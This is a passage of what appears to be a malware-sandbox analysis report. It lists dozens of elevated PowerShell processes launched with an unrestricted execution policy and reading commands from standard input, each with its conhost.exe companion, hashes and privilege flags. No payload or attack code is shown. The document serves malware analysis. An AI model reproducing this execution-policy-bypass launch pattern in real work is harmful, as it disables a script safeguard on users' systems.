Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:11:05:14
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:11:05:14
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:11:05:14
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:11:05:14
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:11:05:14
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:11:05:14
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:11:05:14
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                          Start time:11:05:26
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                          Start time:11:05:26
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                          Start time:11:05:37
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                          Start time:11:05:37
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff71e800000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

Target ID:52
Start time:11:05:47
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:11:05:47
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:11:05:47
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

No disassembly